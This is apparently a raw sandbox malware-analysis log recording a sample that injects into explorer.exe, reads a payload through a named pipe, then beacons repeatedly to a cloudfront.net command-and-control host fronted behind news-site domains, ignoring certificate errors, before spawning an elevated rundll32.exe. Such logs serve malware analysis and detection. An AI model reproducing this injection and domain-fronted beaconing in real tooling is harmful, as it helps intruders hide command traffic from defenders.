Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
Thread Get Context process_name = c:\windows\syswow64\explorer.exe, os_tid = 0xc78 True 1
Fn
Thread Set Context process_name = c:\windows\syswow64\explorer.exe, os_tid = 0xc78 True 1
Fn
Thread Resume process_name = c:\windows\syswow64\explorer.exe, os_tid = 0xc78 True 1
Fn
File Create filename = \\.\pipe\29a7ba79f8, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL False 1
Fn
System Sleep duration = 500 milliseconds (0.500 seconds) True 1
Fn
File Create filename = \\.\pipe\29a7ba79f8, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL True 1
Fn
System Get Time type = Ticks, time = 576734 True 2
Fn
System Sleep duration = 500 milliseconds (0.500 seconds) True 1
Fn
System Get Time type = Ticks, time = 577250 True 1
Fn
File Read filename = \\.\pipe\29a7ba79f8, size = 4, size_out = 4 True 1
Fn
Data
File Read filename = \\.\pipe\29a7ba79f8, size = 112080, size_out = 112080 True 1
Fn
Data
System Get Time type = Local Time, time = 2018-02-16 05:37:04 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/g349f3qf45t5g-k32, accept_types = 2943288, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=U=779b64e1a7ed737adededjdbdh , url = www.reutersmedia.net/safebrowsing/rd/g349f3qf45t5g-k32 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:11 (Local Time) True 1
Fn
System Sleep duration = 13952 milliseconds (13.952 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:22 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:22 (Local Time) True 1
Fn
System Sleep duration = 12288 milliseconds (12.288 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:32 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:32 (Local Time) True 1
Fn
System Sleep duration = 12682 milliseconds (12.682 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:43 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:43 (Local Time) True 1
Fn
System Sleep duration = 13689 milliseconds (13.689 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:54 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:37:54 (Local Time) True 1
Fn
System Sleep duration = 14740 milliseconds (14.740 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:04 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:04 (Local Time) True 1
Fn
System Sleep duration = 13561 milliseconds (13.561 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:15 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:15 (Local Time) True 1
Fn
System Sleep duration = 14340 milliseconds (14.340 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:26 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:26 (Local Time) True 1
Fn
System Sleep duration = 12911 milliseconds (12.911 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:36 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:36 (Local Time) True 1
Fn
System Sleep duration = 13917 milliseconds (13.917 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:47 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:47 (Local Time) True 1
Fn
System Sleep duration = 12608 milliseconds (12.608 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:58 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:38:58 (Local Time) True 1
Fn
System Sleep duration = 13399 milliseconds (13.399 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:39:09 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:39:09 (Local Time) True 1
Fn
System Sleep duration = 12046 milliseconds (12.046 seconds) True 1
Fn
Process #13: rundll32.exe
162 0
»
Information Value
ID #13
File Name c:\windows\syswow64\rundll32.exe
Command Line C:\Windows\syswow64\rundll32.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:08:19, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:02:14
OS Process Information
»
Information Value
PID 0xac4
Parent PID 0xc84 (c:\windows\syswow64\explorer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 60C
0x F44
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000000c0000 0x000c0000 0x000dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d3fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e1fff Private Memory Readable, Writable True False False -
sfc.dll 0x000e0000 0x000e2fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000000f0000 0x000f0000 0x00103fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b1fff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001e7fff Private Memory Readable, Writable True False False -
rundll32.exe.mui 0x001f0000 0x001f0fff Memory Mapped File Readable False False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory Readable, Writable True False False -
locale.nls 0x00210000 0x002cdfff Memory Mapped File Readable False False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0035cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005f0000 0x005f0000 0x005fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000600000 0x00600000 0x00780fff Pagefile Backed Memory Readable True False False -
private_0x0000000000790000 0x00790000 0x007cffff Private Memory Readable, Writable True False False -
private_0x00000000007d0000 0x007d0000 0x0084ffff Private Memory Readable, Writable True False False -
rundll32.exe 0x00910000 0x00921fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000930000 0x00930000 0x0492ffff Pagefile Backed Memory - True False False -
pagefile_0x0000000004930000 0x04930000 0x05d2ffff Pagefile Backed Memory Readable True False False -
private_0x0000000005d30000 0x05d30000 0x05e3dfff Private Memory Readable, Writable True False False -
private_0x0000000005e40000 0x05e40000 0x05f4ffff Private Memory Readable, Writable True False False -
private_0x0000000005e40000 0x05e40000 0x05f3ffff Private Memory Readable, Writable True False False -
private_0x0000000005f40000 0x05f40000 0x05f4ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000005f50000 0x05f50000 0x06441fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000006450000 0x06450000 0x0694afff Private Memory Readable, Writable True False False -
private_0x0000000006950000 0x06950000 0x06e4ffff Private Memory Readable, Writable True False False -
private_0x0000000006e50000 0x06e50000 0x0734efff Private Memory Readable, Writable True False False -
wow64cpu.dll 0x5c9f0000 0x5c9f7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x5ca00000 0x5ca72fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5ca80000 0x5cacefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x736e0000 0x736fafff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x73dd0000 0x73ddefff Memory Mapped File Readable, Writable, Executable False False False -
winspool.drv 0x73de0000 0x73e46fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x73e50000 0x73e66fff Memory Mapped File Readable, Writable, Executable False False False -
aclayers.dll 0x73e70000 0x740e7fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74110000 0x74184fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74190000 0x74220fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74230000 0x74288fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74290000 0x74299fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x742a0000 0x742bdfff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x74350000 0x744f4fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74500000 0x7463ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74730000 0x7475afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74760000 0x75b1efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75b80000 0x75c3dfff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x75c40000 0x75c83fff Memory Mapped File Readable, Writable, Executable False False False -
